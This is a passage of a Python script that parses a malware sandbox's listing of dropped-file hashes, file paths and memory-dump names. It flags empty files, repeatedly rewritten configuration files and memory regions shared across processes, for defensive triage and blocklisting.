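| SHA256 | 33b5c07a614eadb209b95b48454a10b1251809f8cc896577de5e117144b58507 |
C:\ProgramData\AnyDesk\system.conf
| MD5 | b4c040ee0975ae7e298efaecf36d760b |
| SHA1 | a0a2a6e5421de66bb7b31391636aa122e8810712 |
| SHA256 | 15a89b575da7b48af8ef157d9fe3c174cca484f30b74c4192162ec5c1c9b8d4f |
memory/5524-234-0x0000000000E70000-0x00000000025B9000-memory.dmp
C:\ProgramData\gcapi.dll
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
"""

# One markdown row per digest: "| ALGO | hex |"
HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-fA-F]+)\s*\|$")
# Sandbox memory dump name: memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp
DUMP_LINE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")
# A Windows path starts a new dropped-file record
PATH_LINE = re.compile(r"^[A-Za-z]:\\")


def parse_listing(text):
    """Split the listing into dropped-file records and memory-dump records."""
    files, dumps = [], []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = DUMP_LINE.match(line)
        if m:
            pid, seq, start, end = m.groups()
            dumps.append({"pid": int(pid), "seq": int(seq),
                          "start": int(start, 16), "end": int(end, 16)})
            current = None  # hash rows never follow a dump line
            continue
        m = HASH_ROW.match(line)
        if m and current is not None:
            current["hashes"][m.group(1).lower()] = m.group(2).lower()
            continue
        if PATH_LINE.match(line):
            current = {"path": line, "hashes": {}}
            files.append(current)
    return files, dumps


def empty_file_digests():
    """Digests of zero bytes, computed rather than hardcoded."""
    return {algo: hashlib.new(algo).hexdigest()
            for algo in ("md5", "sha1", "sha256", "sha512")}


def empty_files(files):
    """Paths whose every listed digest equals the empty-input digest."""
    empty = empty_file_digests()
    return [f["path"] for f in files
            if f["hashes"] and all(empty[a] == d for a, d in f["hashes"].items())]


def rewritten_paths(files):
    """Paths that appear with more than one distinct SHA256 (rewritten during the run)."""
    seen = defaultdict(set)
    for f in files:
        seen[f["path"]].add(f["hashes"].get("sha256"))
    return {p: len(d) for p, d in seen.items() if len(d) > 1}


def dump_region_sizes(dumps):
    """Byte length of each dumped region, keyed by (pid, seq)."""
    return {(d["pid"], d["seq"]): d["end"] - d["start"] for d in dumps}


def shared_regions(dumps):
    """Identical (start, end) ranges dumped from more than one process."""
    by_range = defaultdict(set)
    for d in dumps:
        by_range[(d["start"], d["end"])].add(d["pid"])
    return {r: sorted(p) for r, p in by_range.items() if len(p) > 1}


if __name__ == "__main__":
    files, dumps = parse_listing(SAMPLE_LISTING)
    print("empty files:", empty_files(files))
    print("rewritten paths:", rewritten_paths(files))
    for (start, end), pids in shared_regions(dumps).items():
        print(f"region 0x{start:X}-0x{end:X} ({end - start:#x} bytes) in PIDs {pids}")
```

Run against the full listing, the empty-file check strips gcapi.dll before its digests reach a blocklist, the rewritten-path check shows which configuration files the sample kept rewriting, and the shared-region check groups the 0x1749000-byte image that several PIDs map at the same base, which is the set of processes worth diffing first.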